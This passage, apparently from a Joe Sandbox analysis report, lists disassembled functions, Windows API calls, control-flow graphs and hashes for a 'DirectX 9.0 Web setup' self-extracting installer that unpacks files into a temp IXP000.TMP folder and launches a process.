                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 01002F9A
                                                                                                • lstrcpyA.KERNEL32(?,?), ref: 01002FAC
                                                                                                  • Part of subcall function 01005B32: lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                  • Part of subcall function 01005B32: CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                  • Part of subcall function 01005B32: lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,?), ref: 01002FBE
                                                                                                • GetFileAttributesA.KERNELBASE(?), ref: 01002FC5
                                                                                                • GetTempFileNameA.KERNEL32(?,IXP,00000000,?), ref: 01002FED
                                                                                                • DeleteFileA.KERNEL32(?), ref: 01002FFB
                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 01003004
                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 01003019
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: DirectoryFile$Createlstrcpy$AttributesCharDeleteNamePrevRemoveTemplstrlenwsprintf
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                • API String ID: 3224660439-2659685179
                                                                                                • Opcode ID: cc23fafd31c200b07fe8fdd91d20a1ba6cd3f4739df2429ec796210adebc7534
                                                                                                • Instruction ID: e7c67a7043ec5c6bac1d4f2c1b8a734ea561e127a1ee01801807ea9209cd36ee
                                                                                                • Opcode Fuzzy Hash: cc23fafd31c200b07fe8fdd91d20a1ba6cd3f4739df2429ec796210adebc7534
                                                                                                • Instruction Fuzzy Hash: A311E1312092496FE373AB65EC48FEB3BACEF46351F000129F6C5D1084DEBA950587A6
                                                                                                Function 01003E60 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65stringmemoryfileCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003E68
                                                                                                • LocalAlloc.KERNEL32(00000040,-00000014,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003E74
                                                                                                • lstrcpyA.KERNEL32(00000000,01004BBC,759183C0,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003EA3
                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,00000000,TMP4351$.TMP,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003EC4
                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003ECD
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003ED9
                                                                                                • GetFileAttributesA.KERNELBASE(01004BBC,?,00000000,01004BBC,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 01003EE0
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(75934B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                Strings
                                                                                                • TMP4351$.TMP, xrefs: 01003EA9
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01003E66
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastLocal$AllocAttributesCloseCreateFreeHandleMessagelstrcpylstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                                                • API String ID: 3688570051-3104274291
                                                                                                • Opcode ID: cec466b1454d8152f2b6b7027edac8848f359d804bd141f2f042a694d3e2b742
                                                                                                • Instruction ID: 07e8854d2f4717a7fcec1bdd87890a29ac9275318df03397e391de66aed45773
                                                                                                • Opcode Fuzzy Hash: cec466b1454d8152f2b6b7027edac8848f359d804bd141f2f042a694d3e2b742
                                                                                                • Instruction Fuzzy Hash: 9A11A5726016447FE223AF799C49F9F3E5CEB06369F014514F2D6E90C5C7BA94418B74
                                                                                                Function 010049DB Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107windowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 443 10049db-10049e2 call 1002e6f 446 10049e4 443->446 447 10049e5-10049f1 443->447 448 10049f3-1004a1b GetDlgItem ShowWindow GetDlgItem ShowWindow 447->448 449 1004a1d-1004a2a call 1003c60 447->449 448->449 452 1004a38-1004a6e call 1005ebf 449->452 453 1004a2c-1004a36 449->453 458 1004aa0-1004aaf 452->458 459 1004a70-1004a87 call 1006e88 452->459 455 1004ab0-1004abb call 10038cc 453->455 462 1004abd-1004ac4 455->462 458->455 463 1004a8c-1004a93 459->463 464 1004ad3-1004ad5 462->464 465 1004ac6-1004acd FreeResource 462->465 463->462 466 1004a95-1004a9e call 10069c2 463->466 467 1004ad7-1004add 464->467 468 1004aef-1004af6 464->468 465->464 466->458 466->462 467->468 469 1004adf-1004aea call 10038cc 467->469 470 1004b14-1004b19 468->470 471 1004af8-1004aff 468->471 469->468 471->470 474 1004b01-1004b0e SendMessageA 471->474 474->470
                                                                                                APIs
                                                                                                  • Part of subcall function 01002E6F: FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01002E89
                                                                                                  • Part of subcall function 01002E6F: LoadResource.KERNEL32(00000000,00000000,?,010059A0), ref: 01002E92
                                                                                                  • Part of subcall function 01002E6F: LockResource.KERNEL32(00000000,?,010059A0), ref: 01002E99
                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 01004A00
                                                                                                • ShowWindow.USER32(00000000,?,00000000,00000001,0100525B,?,010059A0), ref: 01004A09
                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 01004A18
                                                                                                • ShowWindow.USER32(00000000,?,00000000,00000001,0100525B,?,010059A0), ref: 01004A1B
                                                                                                • FreeResource.KERNEL32(00000000,-00000514,00000000,00000000,00000010,00000000,?,?,?,00000000,00000001,0100525B,?,010059A0), ref: 01004AC7
                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,-00000514), ref: 01004B0E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$ItemShowWindow$FindFreeLoadLockMessageSend
                                                                                                • String ID: *MEMCAB
                                                                                                • API String ID: 3694369891-3211172518
                                                                                                • Opcode ID: c58f8bc2a7f7b26109adb1d35207193ebaf4e78ef12d8e4ecae876ef37705db9
                                                                                                • Instruction ID: 5c6169ab3c9c94f66ae9421972872bc9d1b968acd00de396031396c823d54b5c
                                                                                                • Opcode Fuzzy Hash: c58f8bc2a7f7b26109adb1d35207193ebaf4e78ef12d8e4ecae876ef37705db9
                                                                                                • Instruction Fuzzy Hash: 3E31EA313813117AF63367579C89F972D8DDB56B65F400454F7C8E60C6C6FA889087A9
                                                                                                Function 01004560 Relevance: 10.6, APIs: 7, Instructions: 90processsynchronizationwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 476 1004560-1004575 477 1004651-1004654 476->477 478 100457b-100459d CreateProcessA 476->478 479 1004609-1004647 call 1003547 GetLastError FormatMessageA call 10038cc 478->479 480 100459f-10045c0 WaitForSingleObject GetExitCodeProcess 478->480 492 100464c 479->492 482 10045c2-10045c9 480->482 483 10045e3-1004600 call 10028fa CloseHandle * 2 480->483 482->483 485 10045cb-10045cd 482->485 490 1004602-1004605 483->490 491 100464e-1004650 483->491 485->483 489 10045cf-10045db 485->489 489->483 493 10045dd 489->493 490->491 494 1004607 490->494 491->477 492->491 493->483 494->492
                                                                                                APIs
                                                                                                • CreateProcessA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?,00000001,7591F530,00000000), ref: 01004595
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010045A4
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 010045B1
                                                                                                • CloseHandle.KERNEL32(?,?), ref: 010045F2
                                                                                                • CloseHandle.KERNEL32(?), ref: 010045F7
                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 01004621
                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 0100462E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                • String ID:
                                                                                                • API String ID: 3183975587-0
                                                                                                • Opcode ID: 5c87e306d1f07bbbd259af49f0d2f9332393d95cbae5d4cdd0f23aea241cfee2
                                                                                                • Instruction ID: 4dc6fc445a0a4644286cad31dd2cd9ca33170ca9f30bc41b6ca94f876d6a0a06
                                                                                                • Opcode Fuzzy Hash: 5c87e306d1f07bbbd259af49f0d2f9332393d95cbae5d4cdd0f23aea241cfee2
                                                                                                • Instruction Fuzzy Hash: 4521AD35501228BFEB239FA5CC48EEF7BA9FF09360F004025FB94D6095C6768644CBA5
                                                                                                Function 01003D9A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 76memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 495 1003d9a-1003dbf call 1002a34 LocalAlloc 498 1003dc1-1003ddb call 10038cc call 1003547 495->498 499 1003ddd-1003de7 call 1002a34 495->499 512 1003e59 498->512 505 1003de9-1003e0a call 10038cc LocalFree 499->505 506 1003e0c-1003e1a lstrcmpA 499->506 505->512 509 1003e28-1003e45 call 10038cc LocalFree 506->509 510 1003e1c-1003e1d LocalFree 506->510 517 1003e47-1003e4d 509->517 518 1003e4f 509->518 514 1003e23-1003e26 510->514 515 1003e5b-1003e5f 512->515 514->515 517->514 518->512
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,UPROMPT,00000000,00000000,?,00000000,?,?,01005917,00000000,01005A22,00000000,01005ACB,?,?), ref: 01003DB5
                                                                                                • LocalFree.KERNEL32(00000000,00000000,000004B1,00000000,00000000,00000010,00000000,UPROMPT,00000000,00000000,?,00000000,?,?,01005917,00000000), ref: 01003DFA
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32(75934B00,01004003), ref: 0100354E
                                                                                                  • Part of subcall function 01003547: GetLastError.KERNEL32 ref: 01003554
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$ErrorFindLastLocal$AllocFreeLoadLockMessageSizeof
                                                                                                • String ID: <None>$UPROMPT
                                                                                                • API String ID: 226386726-2980973527
                                                                                                • Opcode ID: 19c4e163a1090a162578199d223b225934aaa3b1b5a0be56976e72415ee7bbe1
                                                                                                • Instruction ID: fcd82f8eb2d96e34fe2045f7d831227921619ed0845e22903694ad8dcf9b4982
                                                                                                • Opcode Fuzzy Hash: 19c4e163a1090a162578199d223b225934aaa3b1b5a0be56976e72415ee7bbe1
                                                                                                • Instruction Fuzzy Hash: F01190B164178ABFF2236B329C48F9B3B5CEB0A798F014114F6C29D0C6D7BAA4004B74
                                                                                                Function 01004888 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 519 1004888-1004899 520 10048b5-10048bb 519->520 521 100489b-100489f 519->521 522 10049d0-10049d3 call 1002e1b 520->522 523 10048c1-10048c2 520->523 524 10048a1-10048ac call 1002cb2 521->524 525 10048ad-10048b0 521->525 526 10049d8-10049da 522->526 528 10048c4-10048c5 523->528 529 10048cd-10048cf 523->529 524->525 525->526 532 10048c7-10048c8 528->532 533 100493e-1004948 528->533 529->526 536 10048d4-10048f2 call 1002acd 532->536 537 10048ca-10048cb 532->537 534 1004959-1004974 call 1002acd 533->534 535 100494a-1004953 SetDlgItemTextA 533->535 534->525 542 100497a-1004988 call 1004809 534->542 535->534 536->525 543 10048f4-100490c call 1002d87 536->543 537->525 537->529 542->529 548 100498e-10049ac call 1003b9b 542->548 543->525 549 100490e-1004939 call 1002cb2 call 1002ded SetFileAttributesA 543->549 548->525 555 10049b2-10049c0 call 1003a7a 548->555 549->526 555->525 559 10049c6-10049ce 555->559 559->526
                                                                                                APIs
                                                                                                  • Part of subcall function 01002ACD: lstrlenA.KERNEL32(00000104,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002ADB
                                                                                                  • Part of subcall function 01002ACD: lstrlenA.KERNEL32(?,?,?,?,01004972,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01002AE2
                                                                                                • SetFileAttributesA.KERNELBASE(?,00000000,?,?,?,?,?,00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 0100492B
                                                                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 01004953
                                                                                                  • Part of subcall function 01002E1B: lstrcpyA.KERNEL32(0100B17C,AA4CA1C3,?,?,010049D8,?), ref: 01002E3E
                                                                                                  • Part of subcall function 01002E1B: lstrcpyA.KERNEL32(0100B280,FFFFE48F,?,?,010049D8,?), ref: 01002E48
                                                                                                  • Part of subcall function 01002E1B: lstrcpyA.KERNEL32(0100B384,0175C085,?,?,010049D8,?), ref: 01002E52
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$AttributesFileItemText
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 1052324692-1193786559
                                                                                                • Opcode ID: fe65d99b2ab9b239a6f2feaefbfaa6b709843359da61f41e70cea4a7b0a25d04
                                                                                                • Instruction ID: 9c3945019062b96abff1775c7a9c12b98a3233307227bea5132d982746a7d7c1
                                                                                                • Opcode Fuzzy Hash: fe65d99b2ab9b239a6f2feaefbfaa6b709843359da61f41e70cea4a7b0a25d04
                                                                                                • Instruction Fuzzy Hash: EB31F47160020AABFF73AB78CD44EDE77E8AB04714F0049A1BBD5D60C0DAB4DA94C724
                                                                                                Function 01002D87 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 560 1002d87-1002d9e 561 1002da0-1002da2 560->561 562 1002da4-1002db6 DosDateTimeToFileTime 560->562 563 1002de8-1002dea 561->563 562->561 564 1002db8-1002dc8 LocalFileTimeToFileTime 562->564 564->561 565 1002dca-1002de6 SetFileTime 564->565 565->563
                                                                                                APIs
                                                                                                • DosDateTimeToFileTime.KERNEL32(?,00000104,00000104), ref: 01002DAE
                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01002DC0
                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 01002DDC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Time$File$DateLocal
                                                                                                • String ID:
                                                                                                • API String ID: 2071732420-0
                                                                                                • Opcode ID: 96a0a1fe93097ab5083efa3cebb417dec1f1aca17dfb0d7ec9085fdad69f0f66
                                                                                                • Instruction ID: 272d08cd781b42647d3e3cd2aab8a48c674a3e0d441df13359d39e46509fec88
                                                                                                • Opcode Fuzzy Hash: 96a0a1fe93097ab5083efa3cebb417dec1f1aca17dfb0d7ec9085fdad69f0f66
                                                                                                • Instruction Fuzzy Hash: 81F01D7650011AABDF62DFA4CD49DEF7BBCEF04300F00056AFA96D2054EA31D605CB60
                                                                                                Function 01001E52 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 566 1001e52-1001e76 RegOpenKeyExA 567 1001e78-1001e8d RegQueryValueExA 566->567 568 1001e9b-1001ea0 566->568 569 1001e92-1001e95 RegCloseKey 567->569 570 1001e8f 567->570 569->568 570->569
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,010045E9,00000000,00020019,010045E9,00000000,?,?,01001F1E,System\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations,01001F3D,010045E9,01002634,00000003,00000000), ref: 01001E6E
                                                                                                • RegQueryValueExA.KERNELBASE(010045E9,0100290E,00000000,00000000,00000000,?,?,01001F1E,System\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations,01001F3D,010045E9,01002634,00000003,00000000,0100290E), ref: 01001E85
                                                                                                • RegCloseKey.KERNELBASE(010045E9,?,01001F1E,System\CurrentControlSet\Control\Session Manager,PendingFileRenameOperations,01001F3D,010045E9,01002634,00000003,00000000,0100290E,010045E9,?), ref: 01001E95
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 7a797c0b9dcb7767ccf906ce318d436ef8d89cccfb9cdaf3cd7182f96baaf62c
                                                                                                • Instruction ID: 28be454f978d5970a4e16e1394c3bca2c1ef4d0bed3d580e281dbf39f647a0de
                                                                                                • Opcode Fuzzy Hash: 7a797c0b9dcb7767ccf906ce318d436ef8d89cccfb9cdaf3cd7182f96baaf62c
                                                                                                • Instruction Fuzzy Hash: E1F0D475A01128FBEB229F92DD08DEFBFACEF057A0F008055F98996150D771DA10EBA0
                                                                                                Function 01005B32 Relevance: 4.5, APIs: 3, Instructions: 27stringCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • lstrlenA.KERNEL32(01003456,0000002F,0100B89A,01003456,0100B89A,01001251), ref: 01005B39
                                                                                                • CharPrevA.USER32(01003456,00000000), ref: 01005B49
                                                                                                • lstrcpyA.KERNEL32(00000000,?), ref: 01005B66
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcpylstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3191087442-0
                                                                                                • Opcode ID: fdd7714bb6593d9bd24b37b8e314602ef278b422ca2b5f9048e4f286ffae7ea1
                                                                                                • Instruction ID: a8693eed6350a8dedeae3d565ef5e12137dbdc0ab456e1eef33ff5164d9f3c36
                                                                                                • Opcode Fuzzy Hash: fdd7714bb6593d9bd24b37b8e314602ef278b422ca2b5f9048e4f286ffae7ea1
                                                                                                • Instruction Fuzzy Hash: 5AE06531504A909FF36757189C08BAB7FD8EB86261F150485F5DA93181D37958428F71
                                                                                                Function 010058FE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,01005A22,00000000,01005ACB,?,?,01005ACB,00000000), ref: 0100596D
                                                                                                  • Part of subcall function 01003D9A: LocalAlloc.KERNEL32(00000040,00000001,UPROMPT,00000000,00000000,?,00000000,?,?,01005917,00000000,01005A22,00000000,01005ACB,?,?), ref: 01003DB5
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 01005968
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocCurrentDirectoryLocal
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                • API String ID: 4261067767-1193786559
                                                                                                • Opcode ID: 8bb4dfa89a94fb33ff207bed1ff5b7d72056520cb165bd43416798504c0b475c
                                                                                                • Instruction ID: 549888cb111fa0db324d5ce591e14e605fa8575ce561743fb142ccc2cd60ac89
                                                                                                • Opcode Fuzzy Hash: 8bb4dfa89a94fb33ff207bed1ff5b7d72056520cb165bd43416798504c0b475c
                                                                                                • Instruction Fuzzy Hash: 572175356453139FBFB3BB796D0276A37D4AA176B4F0804AAD5C4C11C5EB3A8180DFA2
                                                                                                Function 01003B00 Relevance: 3.1, APIs: 2, Instructions: 64fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateFileA.KERNELBASE(01003CBD,00000000,00000000,00000000,0000017D,00000080,00000000,00000000,00000000,?,00000000,01003C3C,00000180,00008000,?), ref: 01003B74
                                                                                                • CreateFileA.KERNEL32(01003CBD,00000000,00000000,00000000,0000017D,00000080,00000000,01003CBD,?,00000000,01003C3C,00000180,00008000,?,?,01003CBD), ref: 01003B92
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 9bfb39b486322ac668261688a7a5e61f2137a86f97e3518c83b150ea2e59270c
                                                                                                • Instruction ID: da6b65ada72e5227994d070599185fef503f662e9f89374a7cd07d64c63b9061
                                                                                                • Opcode Fuzzy Hash: 9bfb39b486322ac668261688a7a5e61f2137a86f97e3518c83b150ea2e59270c
                                                                                                • Instruction Fuzzy Hash: 8501B9B2514A097DF7538538DC85F77BADCEB9626DF144729FBE5D50D0C229C8418220
                                                                                                Function 01002C23 Relevance: 3.0, APIs: 2, Instructions: 46fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 0100288F: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 010028B3
                                                                                                  • Part of subcall function 0100288F: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028C5
                                                                                                  • Part of subcall function 0100288F: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028E8
                                                                                                • WriteFile.KERNELBASE(?,?,?,00000000), ref: 01002C59
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
